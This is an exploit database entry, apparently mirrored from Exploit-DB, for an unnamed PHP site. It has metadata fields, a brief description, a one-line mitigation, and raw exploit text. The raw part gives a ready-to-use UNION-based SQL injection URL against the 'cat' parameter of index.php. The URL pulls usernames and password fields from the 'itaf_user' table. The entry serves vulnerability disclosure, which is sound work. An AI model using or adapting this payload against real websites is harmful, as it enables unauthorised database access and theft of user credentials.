header-logo
Suggest Exploit
vendor:
N/A
by:
Manas58 Delibey Tiamo
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Homepage Exploit

This exploit allows an attacker to gain access to the user credentials of the website by exploiting a SQL injection vulnerability in the 'index.php' page. The attacker can use the 'cat' parameter to inject a malicious SQL query which will return the user credentials from the 'itaf_user' table.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in a SQL query.
Source

Exploit-DB raw data:

/**************************************************************************
[+] Homepage    : www.1923turk.biz

**************************************************************************/

## EXPLOIT :
 
http://server/index.php?cat=-89+union+select+1,2,3,concat(user_name,0x3a,user_pass),5,6,7,8,9,0,1,2,3,4,5+from+itaf_user--
 
-----------------------------------------------

Manas58 Delibey Tiamo
 
###############################################################################